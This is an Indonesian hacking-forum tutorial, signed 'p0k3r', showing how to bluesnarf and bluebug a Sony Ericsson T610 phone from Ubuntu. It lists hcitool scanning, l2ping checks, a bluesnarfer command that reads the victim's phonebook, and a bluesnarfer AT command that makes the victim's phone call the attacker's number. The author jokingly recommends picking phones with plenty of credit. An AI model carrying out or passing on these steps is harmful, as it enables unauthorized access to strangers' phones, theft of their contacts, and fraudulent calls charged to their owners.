Talk Less Do More :p
Alat :
- Laptop / PC ( dengan SO Ubuntu 7.04 ). Klo gak ada....minta sm om admin......wkwkwkwkw...
- Bluetooth Class 1 USB Dogle ( radius 100 m ). Klo gak ada jg....beli sana.....wkwkwkw....
- HP Sony Ericsson T610
- Pertama kita harus melihat apakah USB Bluetooth tsb dikenali oleh SO, karena jika tdk maka kita harus mengenalkannya, tentu saja dgn menginstall drivernya. Untuk SO Ubuntu kita dpt melihatnya dgn mengetikkan '' ~$ lsusb '' ( gak pake tanda kutip......gw mengingatkan cm sekali..... :p )
- Pastikan paket blues sdh terinstall ( utk versi kernel terbaru blues sdh otomatis terinstall ). Lalu kita harus melihat output yg ditampilkan saat kernel di load dgn perintah '' ~$ dmesg | grep blue ''
- Truss...lihat modul2 blues dgn perintah '' ~/pentest/bluetooth$ cat/etc/modutils/bluez
- Selanjutnya anda beli rokok dulu.......wkwkwkwkw... Lalu lihat konfigurasi USB Bluetooth dgn perintah '' hciconfig -a hci0 ''
- Skrg kita mencari HP target yg memiliki celah bluesnarfing dan bluebuging ( khususnya yg memiliki banyak pulsa.....wkwkwkw )
Gw jg setengah mati nih nyari HP gituan... Klo loe gak dpt...beli aja....wkkwwkkw...
Atau search aja di Om gw...Om Google..... Keyword '' the device known to be vulnerable at this time '' atau '' handphone yg memiliki celah bluesnarfing dan bluebuging. Ribet yach......wkwkwkwk....
- Kali ini kita akan coba pada HP Sony Ericsson T610 ( bluetooth aktif )
- Lakukan scanning dgn perintah '' ~$hcitool scan ''. Maka akan keluar alamat bluetooth 00:0A:D9:48:B6:88
- Kemudian lakukan ping sekaligus menguji koneksi ke HP dgn perintah '' ~$sudo l2ping 00:0A:D9:48:B6:8B ''. Klo bisa lakukan 4 kali proses ping utk memastikan data terkirim dgn baik.
- Sekarang lancarkan serangan bluesnarfing untuk membaca buku telepon yg ada pd HP.......xixixixixi...
Ketikkan '' ~$sudo ./bluesnarfer -b 00:0A:D9:48:B6:8B -r 1-5
NB : 1-5 adalah no.urut 1 s/d 5 pada buku telepon HP tsb.
- Nah....yg ini paling mantaps....wkwkwkw... Jalankan lg program bluesnarfer yg dilengkapi option '' c '' untuk menjalankan perintah MENELEPON ke nomor anda. Ketikkan '' ~/bt/bluesnarfer$sudo ./bluesnarfer -b 00:0A:D9:48:B6:8B -c 'ATDT081xxxxxxxxx;' ''.
NB : 081xxxxxxxxx adalah no. HP anda
- Tunggu beberapa detik dan HP Sony Ericsson T610 akan menghubungi HP anda......wkwkwkwkw....
---// Clue
Sebagian Handphone memiliki celah terserang teknik bluesnarfing ataupun bluebug saat visible (discoverable) dan sebagian lainnya non-visible (non-discoverable), sementara beberapa jenis lainnya tidak vulnerable kecuali dgn menggunakan backdoor attack dan teknik bluejacking (social engineering)
Regards,
p0k3r
by : http://echo.or.id/forum/viewtopic.php?t=15222
